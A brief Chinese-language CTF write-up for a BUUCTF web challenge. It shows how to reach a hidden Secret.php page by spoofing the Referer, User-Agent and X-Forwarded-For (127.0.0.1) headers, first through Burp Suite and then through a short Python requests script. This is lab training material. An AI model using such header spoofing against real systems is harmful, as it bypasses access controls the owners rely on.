方法一
1、检查网页源代码发现存在一个Secret.php文件的链接,尝试进入该链接下的网页,提示It doesn't come from 'https://Sycsecret.buuoj.cn'
2、进入https://Sycsecret.buuoj.cn,直接报404,与前一个网页提示的内容一样不在这个页面下
3、用BP拦截,尝试找到真实的flag网页
Referer头为https://Sycsecret.buuoj.cn,在请求头中添加Referer:https://Sycsecret.buuoj.cn字段发送请求后得到响应为
4、更改User-Agent为"Syclover" browser发送请求
5、提示要是来自本地的访问请求,所以更改XFF头为127.0.0.1
方法二
python
import requests #用于向服务器发送请求
from bs4 import BeautifulSoup
url = 'http://node5.buuoj.cn:25448/Secret.php'
headers={
'Referer': 'https://Sycsecret.buuoj.cn',
'User-Agent': 'Syclover',
'X-Forwarded-For': '127.0.0.1'
}
res=requests.get(url,headers=headers).text
soup=BeautifulSoup(res,'lxml').body.text.strip().strip('Syclover @ cl4y').strip()
print(soup)